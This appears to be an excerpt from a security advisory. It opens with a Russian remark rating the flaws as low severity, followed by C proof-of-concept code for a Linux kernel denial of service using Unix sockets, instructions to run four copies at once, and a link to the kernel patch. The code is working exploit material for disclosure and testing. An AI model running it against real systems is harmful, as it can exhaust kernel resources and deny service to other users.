> Из за трудности эксплуатации уязвимостям присвоен незначительный уровень опасности. ------------
int main(void) {
int ret, csd, lsd;
struct sockaddr_un sun;
/* make an abstruct name address (*) */
memset(&sun, 0, sizeof(sun));
sun.sun_family = PF_UNIX;
sprintf(&sun.sun_path[1], "%d", getpid());
/* create the listening socket and shutdown */
lsd = socket(AF_UNIX, SOCK_STREAM, 0);
bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
listen(lsd, 1);
shutdown(lsd, SHUT_RDWR);
/* connect loop */
alarm(15); /* forcely exit the loop after 15 sec */
for (;;) {
csd = socket(AF_UNIX, SOCK_STREAM, 0);
ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
if (-1 == ret) {
perror("connect()");
break;
}
puts("Connection OK");
}
return 0;
}
-----
You should run the ./unix-socket-dos-exploit concurrently, like below:
for i in {1..4} ; do ./unix-socket-dos-exploit & done
# For safety reason, the PoC code stops in 15 seconds by alarm(15).
http://patchwork.kernel.org/patch/54678/